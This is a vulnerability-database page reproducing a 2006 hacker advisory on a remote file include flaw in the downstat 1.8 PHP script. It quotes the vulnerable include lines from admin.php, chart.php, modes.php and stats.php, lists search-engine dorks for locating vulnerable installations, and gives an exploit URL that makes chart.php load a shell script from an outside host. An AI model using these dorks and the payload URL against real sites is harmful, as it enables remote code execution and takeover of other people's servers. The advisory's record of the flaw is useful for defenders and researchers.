Lucene search

downstat18.txt

🗓️ 14 Sep 2006 00:00:00Reported by SilenZType

packetstorm🔗 packetstormsecurity.com👁 29 Views

Remote file include vulnerability in downstat 1.8 softwar

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`DESCRIPTION: Remote file include vuln found by sZ [sept, 8 2006.]  
SOFTWARE: downstat 1.8  
VENDOR URL: http://vmist.net/index.php?script=Downstat  
DORKs:  
"Login To Downstat 1.8"  
allinurl:"/downstat/"  
  
  
NOTES: greetz to: neo-vortex, sk0tie, icez. visit @ irc.bluehell.org #silenz  
  
  
VULN CODE:  
------  
admin.php:  
  
if(!@include($art."in_php.php")) exit("upload ".$art."in_php.php");  
  
------  
chart.php:  
  
if(!@include($art."downstat_art/in_html.php")){ exit("upload ".$art."in_html.php"); }  
------  
modes.php  
  
if(!@include($art."downstat_art/in_html.php")){ exit("upload ".$art."in_html.php"); }   
-----  
stats.php  
  
if(!@include($art."downstat_art/in_html.php")){ exit("upload ".$art."in_html.php"); }  
----  
  
  
EXAMPLE:  
http://site.com/downstat1.8/chart.php?art=http://silenz.be/shell.txt?  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

14 Sep 2006 00:00Current

7.4High risk

Vulners AI Score7.4